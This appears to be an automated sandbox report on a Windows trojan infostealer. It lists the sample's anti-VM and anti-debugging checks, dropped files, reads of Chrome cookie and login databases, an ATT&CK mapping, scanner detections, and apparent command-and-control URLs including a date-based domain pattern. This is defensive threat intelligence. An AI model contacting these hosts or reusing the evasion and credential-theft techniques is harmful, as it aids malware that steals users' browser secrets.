Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	Binary or memory string: vmware
Source: aOn5CfTiwS.exe, 00000000.00000003.213585435.00000000022BB000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: aOn5CfTiwS.exe, 00000000.00000003.213567908.00000000022B2000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}CC?
Source: aOn5CfTiwS.exe, 00000000.00000003.213561044.0000000002DF6000.00000004.00000040.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}U
Source: ecv71A3.tmp.1.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150347Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=31fc4362adbf4e51ac951f4816f7487c&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663703&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663703&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: aOn5CfTiwS.exe, 00000000.00000003.213541122.00000000022EF000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: aOn5CfTiwS.exe, 00000000.00000003.213541122.00000000022EF000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	Binary or memory string: See collectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatscollectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatscollectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatsError from reader: %sbad allocationsessionurls_to_restore_on_startuptabnew_open_urlbad allocationAfx:400000:8:10003:0:WPETCPViewClassTStdHttpAnalyzerFormgdkWindowToplevelXTPMainFrameHTTP DebuggerTelerik FiddlerASExplorerSunAwtFrameCharlesBurp Suitebad allocationvmwarevirtualvboxDisplayLegacyDriverDiskDriveCDROMMousebad allocation=> Send header=> Send data=> Send SSL data<= Recv header<= Recv data<= Recv SSL data[OnDebug] text = %s
Source: aOn5CfTiwS.exe, 00000000.00000003.213534311.00000000022DE000.00000004.00000001.sdmp	Binary or memory string: SWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 2_2_00951C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040D071 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 2_2_00958290 GetProcessHeap,HeapFree,

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_00951C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: GetLocaleInfoA,

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: 0_2_004A51E8 GetLocalTime,wsprintfA,

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: 0_2_004A52D8 GetVersion,GetCurrentThreadId,EnumThreadWindows,

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Windows Service1	Windows Service1	Obfuscated Files or Information2	Input Capture2	System Information Discovery15	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection11	Install Root Certificate1	Security Account Manager	Security Software Discovery31	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture2	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Application Window Discovery11	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection11	Cached Domain Credentials	Remote System Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Network Configuration Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
aOn5CfTiwS.exe	44%	Virustotal		Browse
aOn5CfTiwS.exe	27%	Metadefender		Browse
aOn5CfTiwS.exe	48%	ReversingLabs	Win32.Trojan.Phonzy
aOn5CfTiwS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\xldl.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\1612058829275.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Roaming\1612058829275.exe	14%	ReversingLabs	Win32.Infostealer.EdgeCookiesView

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.1.aOn5CfTiwS.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
1a469593c1fe15dc.xyz	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd	0%	Avira URL Cloud	safe
https://www.messenger.comaccept-language:	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/fb	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/ddpxztN8b6xDUh	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-700-webfont.b125dc012841fa8a23b98c37499ca5e8	0%	Avira URL Cloud	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://1a469593c1fe15dc.xyz/info/stepstatus=0&L	0%	Avira URL Cloud	safe
http://ocsp.pki.goog/GTSGIAG30	0%	Avira URL Cloud	safe
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-300-webfont.96dd56ebb50aa0150f6630360d8d69cf	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/stepmsn.com%2FB	0%	Avira URL Cloud	safe
https://static.nc	0%	Avira URL Cloud	safe
https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd.js	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/step	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
https://support.google.	0%	Avira URL Cloud	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://static.nc-img.com/uiraa/libs/polyfills_469970f8ffedace1b5b8	0%	Avira URL Cloud	safe
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-500-webfont.5d9883d92e2eaa724e4e6beb0ef6728a	0%	Avira URL Cloud	safe
https://static.nc-img.com/pp/nc-ui-globalenv/mainLegacy.bb0357e72b1f882521990fd54c3c08d1.css	0%	Avira URL Cloud	safe
https://www.instagram.comreferer:	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
https://static.nc-img.com/uiraa/app.ab29bfd164428d10f32bc34df1cad4ed.css	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/fb1.6	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0#	0%	Avira URL Cloud	safe
https://static.nc-img.com/uiraa/libs/vendors_70ac76496c2b0e5ed06c	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/stepxztN8b6xDUh	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	Avira URL Cloud	safe
http://exchangework%04d%02d%02d.xyz/accept:	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/stepbidden	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/ddpbidden	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTSGIAG3.crl0	0%	Avira URL Cloud	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://1a469593c1fe15dc.xyz/info/dd	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/fbX	0%	Avira URL Cloud	safe
